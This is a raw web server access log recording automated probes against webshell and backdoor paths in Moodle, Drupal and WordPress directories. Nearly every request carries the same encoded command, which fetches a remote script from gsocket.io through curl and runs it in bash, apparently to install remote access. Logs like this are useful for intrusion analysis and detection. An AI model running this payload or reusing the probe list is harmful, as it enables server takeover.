68.183.183.85 - - [14/Apr/2025:13:35:05 +0300] "GET /modules/ctools-8.x-3.4/ctools/shell.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [14/Apr/2025:13:35:09 +0300] "GET /sites/all/modules/views-7.x-3.24/views/shell.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [14/Apr/2025:13:35:14 +0300] "GET /moodle/blocks/rce/lang/en/block_rce.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [14/Apr/2025:13:35:39 +0300] "GET /campus/local/moodle_webshell/webshell.php?action=exec&cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [14/Apr/2025:13:35:45 +0300] "GET /uploads/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [14/Apr/2025:13:35:50 +0300] "GET /img/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [14/Apr/2025:13:35:57 +0300] "GET /?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 303 743 "-" "python-requests/2.32.3"
68.183.183.85 - - [14/Apr/2025:13:36:05 +0300] "GET /?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 303 743 "-" "python-requests/2.32.3"
68.183.183.85 - - [14/Apr/2025:13:36:10 +0300] "GET /command.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [14/Apr/2025:13:36:20 +0300] "GET /command.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [14/Apr/2025:13:36:23 +0300] "GET /img/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [14/Apr/2025:13:36:30 +0300] "GET /uploads/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [14/Apr/2025:13:36:41 +0300] "GET /wp-content/uploads/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [14/Apr/2025:13:36:44 +0300] "GET /wp-content/upload/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
82.23.183.22 - - [14/Apr/2025:12:44:47 +0300] "GET / HTTP/1.1" 303 1491 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
185.213.83.133 - - [14/Apr/2025:12:51:21 +0300] "GET /local/moodle_webshell/webshell.php?action=exec&cmd=bash%20-c%20%22$(%20curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
185.213.83.133 - - [14/Apr/2025:12:51:27 +0300] "GET /local/moodle_webshell/webshell.php?action=exec&cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y?port=53)%22 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
68.183.183.85 - - [14/Apr/2025:13:34:37 +0300] "GET /cgi-bin/admin.cgi?Command=sysCommand&Cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [14/Apr/2025:13:34:50 +0300] "GET /modules/mod_webshell/mod_webshell.php?action=exec&cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [14/Apr/2025:13:34:57 +0300] "GET /all/modules/views-7.x-3.24/views/shell.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [14/Apr/2025:13:35:12 +0300] "GET /blocks/rce/lang/en/block_rce.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [14/Apr/2025:13:35:20 +0300] "GET /moodle/local/moodle_webshell/webshell.php?action=exec&cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [14/Apr/2025:13:35:24 +0300] "GET /aulavirtual/blocks/rce/lang/en/block_rce.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [14/Apr/2025:13:35:28 +0300] "GET /aulavirtual/local/moodle_webshell/webshell.php?action=exec&cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [14/Apr/2025:13:35:31 +0300] "GET /campus/blocks/rce/lang/en/block_rce.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [14/Apr/2025:13:36:14 +0300] "GET /cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [14/Apr/2025:13:36:26 +0300] "GET /upload/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [14/Apr/2025:13:36:34 +0300] "GET /wp-content/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [14/Apr/2025:13:36:48 +0300] "GET /wp-content/plugins/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [14/Apr/2025:13:37:16 +0300] "GET /files/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [14/Apr/2025:13:37:19 +0300] "GET /.tmb/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [14/Apr/2025:13:37:28 +0300] "GET /server/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [14/Apr/2025:13:37:31 +0300] "GET /uploads/foto/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [14/Apr/2025:13:37:34 +0300] "GET /upload/foto/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [14/Apr/2025:13:36:51 +0300] "GET /wp-admin/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [14/Apr/2025:13:36:56 +0300] "GET /css/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [14/Apr/2025:13:37:03 +0300] "GET /js/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [14/Apr/2025:13:37:07 +0300] "GET /foto/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [14/Apr/2025:13:37:10 +0300] "GET /img/files/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [14/Apr/2025:13:37:25 +0300] "GET /tmp/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [14/Apr/2025:13:37:37 +0300] "GET /files/css/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [14/Apr/2025:13:37:42 +0300] "GET /file/css/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [14/Apr/2025:13:37:55 +0300] "GET /folders/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [14/Apr/2025:13:37:59 +0300] "GET /img/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [14/Apr/2025:13:38:03 +0300] "GET /upload/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [14/Apr/2025:13:38:22 +0300] "GET /wp-content/plugins/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [14/Apr/2025:13:38:26 +0300] "GET /wp-admin/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [14/Apr/2025:13:38:33 +0300] "GET /js/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [14/Apr/2025:13:38:38 +0300] "GET /foto/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [14/Apr/2025:13:39:02 +0300] "GET /uploads/foto/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [14/Apr/2025:13:39:05 +0300] "GET /upload/foto/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [14/Apr/2025:13:39:10 +0300] "GET /files/css/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [14/Apr/2025:13:37:49 +0300] "GET /class/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [14/Apr/2025:13:38:06 +0300] "GET /uploads/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [14/Apr/2025:13:38:11 +0300] "GET /wp-content/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [14/Apr/2025:13:38:14 +0300] "GET /wp-content/uploads/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [14/Apr/2025:13:38:17 +0300] "GET /wp-content/upload/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [14/Apr/2025:13:38:30 +0300] "GET /css/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [14/Apr/2025:13:38:40 +0300] "GET /img/files/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [14/Apr/2025:13:38:44 +0300] "GET /files/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [14/Apr/2025:13:38:48 +0300] "GET /.tmb/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [14/Apr/2025:13:38:54 +0300] "GET /tmp/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [14/Apr/2025:13:38:57 +0300] "GET /server/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [14/Apr/2025:13:39:16 +0300] "GET /file/css/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [14/Apr/2025:13:39:20 +0300] "GET /class/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [14/Apr/2025:13:39:24 +0300] "GET /folders/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
43.159.149.56 - - [14/Apr/2025:13:51:28 +0300] "GET / HTTP/1.1" 303 743 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"